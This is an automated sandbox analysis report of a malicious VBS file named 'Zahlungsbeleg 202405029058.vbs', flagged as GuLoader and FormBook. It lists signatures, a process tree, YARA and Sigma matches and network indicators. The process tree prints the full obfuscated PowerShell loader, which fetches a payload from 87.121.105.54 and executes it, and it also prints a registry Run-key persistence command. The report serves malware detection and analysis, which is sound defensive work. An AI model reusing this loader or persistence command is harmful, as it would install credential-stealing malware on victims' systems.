Windows Analysis Report
Zahlungsbeleg 202405029058.vbs

Overview

General Information

Sample name: Zahlungsbeleg 202405029058.vbs
Analysis ID: 1436288
MD5: 913fa02445aa8092996ad3f000aa1ea1
SHA1: c29022193884baeb4aad8a94884995ea80bdeb25
SHA256: f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78
Tags: DEUgeovbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6712 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 6656 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 7184 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. 
HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden 
+Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7464 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7560 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument identical to that of powershell.exe PID 7316 above] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7656 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7948 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 7992 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8040 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • kOAlByYcnQDKnTplLRjSHzGyPq.exe (PID: 2872 cmdline: "C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 7264 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • kOAlByYcnQDKnTplLRjSHzGyPq.exe (PID: 3496 cmdline: "C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • WerFault.exe (PID: 1456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a380:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
          Source | Rule | Description | Author | Strings
          amsi64_7316.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
          • 0xff71:$b2: ::FromBase64String(
          • 0xd329:$s1: -join
          • 0x6ad5:$s4: +=
          • 0x6b97:$s4: +=
          • 0xadbe:$s4: +=
          • 0xcedb:$s4: +=
          • 0xd1c5:$s4: +=
          • 0xd30b:$s4: +=
          • 0xf55c:$s4: +=
          • 0xf5dc:$s4: +=
          • 0xf6a2:$s4: +=
          • 0xf722:$s4: +=
          • 0xf8f8:$s4: +=
          • 0xf97c:$s4: +=
          • 0xda45:$e4: Get-WmiObject
          • 0xdc34:$e4: Get-Process
          • 0xdc8c:$e4: Start-Process
          amsi32_7560.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
          • 0xfee2:$b2: ::FromBase64String(
          • 0xd329:$s1: -join
          • 0x6ad5:$s4: +=
          • 0x6b97:$s4: +=
          • 0xadbe:$s4: +=
          • 0xcedb:$s4: +=
          • 0xd1c5:$s4: +=
          • 0xd30b:$s4: +=
          • 0xf55c:$s4: +=
          • 0xf5dc:$s4: +=
          • 0xf6a2:$s4: +=
          • 0xf722:$s4: +=
          • 0xf8f8:$s4: +=
          • 0xf97c:$s4: +=
          • 0xda45:$e4: Get-WmiObject
          • 0xdc34:$e4: Get-Process
          • 0xdc8c:$e4: Start-Process
          • 0x17802:$e4: Get-Process

          System Summary

          Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", ProcessId: 6712, ProcessName: wscript.exe
          Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7948, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 7992, ProcessName: cmd.exe
          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
          Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7992, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 8040, ProcessName: reg.exe
          Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7948, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)", ProcessId: 7992, ProcessName: cmd.exe
          Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems): Data: Details: %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
          Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs", ProcessId: 6712, ProcessName: wscript.exe
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument as in the powershell.exe PID 7316 entry above; cut off in the report]
          No Snort rule has matched

          AV Detection

          Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h 20_2_009C9390
          Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then xor eax, eax 20_2_009C9390
          Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h 20_2_009C9386

          Networking

          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: global traffic HTTP traffic detected: GET /Oxaluria209.smi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 87.121.105.54 Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /vKdsOriqv105.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 87.121.105.54 Cache-Control: no-cache
          Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
          Source: global traffic DNS traffic detected: DNS query: google.com
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54/Oxaluria209.smi
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54/Oxaluria209.smiP
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
